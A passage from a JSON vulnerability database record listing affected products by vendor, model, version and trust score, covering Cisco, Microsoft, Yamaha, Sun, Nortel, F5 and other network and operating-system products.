            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": "9 (x86)"
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "7.x"
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "8.x"
          },
          {
            "_id": null,
            "model": "connectra",
            "scope": null,
            "trust": 0.8,
            "vendor": "check point",
            "version": null
          },
          {
            "_id": null,
            "model": "vpn-1 power vsx",
            "scope": null,
            "trust": 0.8,
            "vendor": "check point",
            "version": null
          },
          {
            "_id": null,
            "model": "vpn-1 power/utm",
            "scope": null,
            "trust": 0.8,
            "vendor": "check point",
            "version": null
          },
          {
            "_id": null,
            "model": "vpn-1 pro/express",
            "scope": null,
            "trust": 0.8,
            "vendor": "check point",
            "version": null
          },
          {
            "_id": null,
            "model": "proxysg",
            "scope": "lte",
            "trust": 0.8,
            "vendor": "blue coat",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "sgos",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "blue coat",
            "version": "4"
          },
          {
            "_id": null,
            "model": "sgos",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "blue coat",
            "version": "5"
          },
          {
            "_id": null,
            "model": "sgos",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "blue coat",
            "version": "6"
          },
          {
            "_id": null,
            "model": "windows 2000",
            "scope": null,
            "trust": 0.8,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "windows server 2003",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "microsoft",
            "version": "none"
          },
          {
            "_id": null,
            "model": "windows server 2003",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "microsoft",
            "version": "(itanium)"
          },
          {
            "_id": null,
            "model": "windows server 2003",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "microsoft",
            "version": "(x64)"
          },
          {
            "_id": null,
            "model": "windows server 2008",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "microsoft",
            "version": "(itanium)"
          },
          {
            "_id": null,
            "model": "windows server 2008",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "microsoft",
            "version": "(x64)"
          },
          {
            "_id": null,
            "model": "windows server 2008",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "microsoft",
            "version": "(x86)"
          },
          {
            "_id": null,
            "model": "windows vista",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "microsoft",
            "version": "none"
          },
          {
            "_id": null,
            "model": "windows vista",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "microsoft",
            "version": "(x64)"
          },
          {
            "_id": null,
            "model": "windows xp",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "microsoft",
            "version": "(x64)"
          },
          {
            "_id": null,
            "model": "windows xp",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "microsoft",
            "version": "sp3"
          },
          {
            "_id": null,
            "model": "rt100i",
            "scope": null,
            "trust": 0.8,
            "vendor": "yamaha",
            "version": null
          },
          {
            "_id": null,
            "model": "rt102i",
            "scope": null,
            "trust": 0.8,
            "vendor": "yamaha",
            "version": null
          },
          {
            "_id": null,
            "model": "rt103i",
            "scope": null,
            "trust": 0.8,
            "vendor": "yamaha",
            "version": null
          },
          {
            "_id": null,
            "model": "rt105 series",
            "scope": null,
            "trust": 0.8,
            "vendor": "yamaha",
            "version": null
          },
          {
            "_id": null,
            "model": "rt107e",
            "scope": null,
            "trust": 0.8,
            "vendor": "yamaha",
            "version": null
          },
          {
            "_id": null,
            "model": "rt140 series",
            "scope": null,
            "trust": 0.8,
            "vendor": "yamaha",
            "version": null
          },
          {
            "_id": null,
            "model": "rt200i",
            "scope": null,
            "trust": 0.8,
            "vendor": "yamaha",
            "version": null
          },
          {
            "_id": null,
            "model": "rt56v",
            "scope": null,
            "trust": 0.8,
            "vendor": "yamaha",
            "version": null
          },
          {
            "_id": null,
            "model": "rt58i",
            "scope": null,
            "trust": 0.8,
            "vendor": "yamaha",
            "version": null
          },
          {
            "_id": null,
            "model": "rt60w",
            "scope": null,
            "trust": 0.8,
            "vendor": "yamaha",
            "version": null
          },
          {
            "_id": null,
            "model": "rt80i",
            "scope": null,
            "trust": 0.8,
            "vendor": "yamaha",
            "version": null
          },
          {
            "_id": null,
            "model": "rta50i",
            "scope": null,
            "trust": 0.8,
            "vendor": "yamaha",
            "version": null
          },
          {
            "_id": null,
            "model": "rta52i",
            "scope": null,
            "trust": 0.8,
            "vendor": "yamaha",
            "version": null
          },
          {
            "_id": null,
            "model": "rta54i",
            "scope": null,
            "trust": 0.8,
            "vendor": "yamaha",
            "version": null
          },
          {
            "_id": null,
            "model": "rta55i",
            "scope": null,
            "trust": 0.8,
            "vendor": "yamaha",
            "version": null
          },
          {
            "_id": null,
            "model": "rtw65b",
            "scope": null,
            "trust": 0.8,
            "vendor": "yamaha",
            "version": null
          },
          {
            "_id": null,
            "model": "rtw65i",
            "scope": null,
            "trust": 0.8,
            "vendor": "yamaha",
            "version": null
          },
          {
            "_id": null,
            "model": "rtx1200",
            "scope": null,
            "trust": 0.8,
            "vendor": "yamaha",
            "version": null
          },
          {
            "_id": null,
            "model": "rtx3000",
            "scope": null,
            "trust": 0.8,
            "vendor": "yamaha",
            "version": null
          },
          {
            "_id": null,
            "model": "srt100",
            "scope": null,
            "trust": 0.8,
            "vendor": "yamaha",
            "version": null
          },
          {
            "_id": null,
            "model": "fitelnet-e series",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "furukawa electric",
            "version": "fitelnet-e20/e30"
          },
          {
            "_id": null,
            "model": "fitelnet-f series",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "furukawa electric",
            "version": "fitelnet-f3000"
          },
          {
            "_id": null,
            "model": "fitelnet-f series",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "furukawa electric",
            "version": "fitelnet-f40"
          },
          {
            "_id": null,
            "model": "fitelnet-f series",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "furukawa electric",
            "version": "fitelnet-f80/f100/f120/f140/f1000/f2000"
          },
          {
            "_id": null,
            "model": "mucho series",
            "scope": null,
            "trust": 0.8,
            "vendor": "furukawa electric",
            "version": null
          },
          {
            "_id": null,
            "model": "ip38x series",
            "scope": null,
            "trust": 0.8,
            "vendor": "nec",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.4 gc1",
            "scope": "ne",
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.4",
            "scope": "ne",
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "7.1"
          },
          {
            "_id": null,
            "model": "windows vista business 64-bit edition sp1",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "windows vista edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "x640"
          },
          {
            "_id": null,
            "model": "ios 12.3b",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "email and web security appliance patch",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "mcafee",
            "version": "5.14"
          },
          {
            "_id": null,
            "model": "ios 12.4 xm3",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.4jk",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.4 xz2",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 95",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.4jx",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "access gateway enterprise edition",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "citrix",
            "version": "9.1.100.3"
          },
          {
            "_id": null,
            "model": "coat systems proxysg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blue",
            "version": "4.3.3"
          },
          {
            "_id": null,
            "model": "bigip link controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.4"
          },
          {
            "_id": null,
            "model": "coat systems proxysg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blue",
            "version": "5.2.4.3"
          },
          {
            "_id": null,
            "model": "ios 12.2yg",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "8.3(7)"
          },
          {
            "_id": null,
            "model": "ios 12.2sb",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows vista enterprise 64-bit edition sp1",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2 sb2",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3jec",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 54",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "rt140i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 93",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.4xg",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2yx",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3yj",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "rt105i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "windows server datacenter edition sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003x64"
          },
          {
            "_id": null,
            "model": "windows vista enterprise 64-bit edition sp2",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.3(1)"
          },
          {
            "_id": null,
            "model": "ios 12.4 t5e",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "networks contact center manager server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "ios 12.2sz",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2sl",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1aa",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows server enterprise edition itanium",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "20030"
          },
          {
            "_id": null,
            "model": "ios 12.3yh",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows vista home basic",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2zh",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "pix/asa",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.2(4.18)"
          },
          {
            "_id": null,
            "model": "networks self service video server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "-0"
          },
          {
            "_id": null,
            "model": "ios 12.2yr",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0s",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "4.3.1"
          },
          {
            "_id": null,
            "model": "ios 12.3xi",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1xf",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "linux enterprise sp2 debuginfo",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "_id": null,
            "model": "ios 12.0xf",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0 s12",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "bigip psm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "ios 12.0xm",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows server for 32-bit systems",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "20080"
          },
          {
            "_id": null,
            "model": "ios 12.1gb",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "catos clr",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.4"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 121",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1da",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3xb",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows server enterprise edition itanium sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "wanjet",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "ios 12.1xm",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.4 xw10",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "rtx3000",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "bigip local traffic manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.4.8"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 99",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "messaging application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "0"
          },
          {
            "_id": null,
            "model": "linux enterprise sp1 debuginfo",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "_id": null,
            "model": "cms server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "15.0"
          },
          {
            "_id": null,
            "model": "networks ethernet routing switch 4526fx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "4500"
          },
          {
            "_id": null,
            "model": "ios 12.2zl",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows xp tablet pc edition sp3",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "networks ethernet routing switch 2526t-pwr",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "2500"
          },
          {
            "_id": null,
            "model": "rfc requirements for internet hosts communic",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ietf",
            "version": "1122:0"
          },
          {
            "_id": null,
            "model": "networks ethernet routing switch 4524gt-pwr",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "4500"
          },
          {
            "_id": null,
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "4.2"
          },
          {
            "_id": null,
            "model": "windows vista business sp2",
            "scope": null,
            "trust": 0.3,
            "vendor": "microsoft",
            "version": null
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.6(18)"
          },
          {
            "_id": null,
            "model": "ios 12.3jl",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "networks switched firewall sfa-6400",
            "scope": null,
            "trust": 0.3,
            "vendor": "nortel",
            "version": null
          },
          {
            "_id": null,
            "model": "networks multimedia comm mas",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "0"
          },
          {
            "_id": null,
            "model": "point vpn-1 pro/express r70.1",
            "scope": null,
            "trust": 0.3,
            "vendor": "check",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3jea",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "stonegate ips sensor and analyzer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "5.0.1"
          },
          {
            "_id": null,
            "model": "windows vista ultimate 64-bit edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "0"
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "8.4(5)"
          },
          {
            "_id": null,
            "model": "solaris 8 sparc",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "bigip global traffic manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.3.1"
          },
          {
            "_id": null,
            "model": "ios 12.4 jk4",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "networks contact center agent desktop display",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "-0"
          },
          {
            "_id": null,
            "model": "ios 12.3xw",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows vista enterprise 64-bit edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "0"
          },
          {
            "_id": null,
            "model": "networks ethernet routing switch 5698tfd-pwr",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "5000"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 100",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 124",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "rfc requirements for internet hosts applicat",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ietf",
            "version": "1123:0"
          },
          {
            "_id": null,
            "model": "ios 12.2yf",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 123",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2xr",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.6(3)"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 49",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "windows server web edition sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "networks ethernet routing switch 2550t",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "2500"
          },
          {
            "_id": null,
            "model": "ios 12.4jma",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.3ja",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2zm",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows server sp4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "windows advanced server sp4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.6(19.2)"
          },
          {
            "_id": null,
            "model": "access gateway enterprise edition",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "citrix",
            "version": "8.1.68.7"
          },
          {
            "_id": null,
            "model": "ios 12.0wc",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 114",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0xk",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2ixa",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "suse linux retail solution",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "networks self-service ccss7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "-0"
          },
          {
            "_id": null,
            "model": "networks self-service peri nt server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "0"
          },
          {
            "_id": null,
            "model": "linux enterprise desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 128",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2 sxh5",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 85",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 19",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "windows vista edition sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "x64"
          },
          {
            "_id": null,
            "model": "nexus",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "70000"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 107",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "stonegate ips sensor and analyzer",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "5.0.2"
          },
          {
            "_id": null,
            "model": "netscaler build",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "citrix",
            "version": "8.157.3"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 45",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "coat systems proxysg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blue",
            "version": "4.2"
          },
          {
            "_id": null,
            "model": "ios 12.3yx",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "windows server datacenter edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "ios 12.0xb",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.5"
          },
          {
            "_id": null,
            "model": "ios 12.1xh",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2sra",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2zya",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1xb",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "cms server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "14.1"
          },
          {
            "_id": null,
            "model": "suse linux standard server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "ios 12.2cx",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1ay",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1xe",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "rt105p",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "yamaha",
            "version": "0"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 78",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2by",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 108",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "bigip wan optimization module",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "ios 12.2 sxf16",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 28",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.1xl",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "networks self-service peri workstation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "0"
          },
          {
            "_id": null,
            "model": "windows advanced server sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "ios 12.2b",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "firepass",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "6.0.3"
          },
          {
            "_id": null,
            "model": "ios 12.2zx",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "bigip application security manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.3.1"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "12.4(25)"
          },
          {
            "_id": null,
            "model": "ios 12.2sq",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 89",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "windows server standard edition sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2003"
          },
          {
            "_id": null,
            "model": "networks callpilot 703t",
            "scope": null,
            "trust": 0.3,
            "vendor": "nortel",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.2xu",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "catos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "8.5(4)"
          },
          {
            "_id": null,
            "model": "ir",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "windows datacenter server sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "microsoft",
            "version": "2000"
          },
          {
            "_id": null,
            "model": "ios 12.3jx",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 39",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "coat systems proxysg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blue",
            "version": "5.2.2.5"
          },
          {
            "_id": null,
            "model": "open-enterprise-server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "0"
          },
          {
            "_id": null,
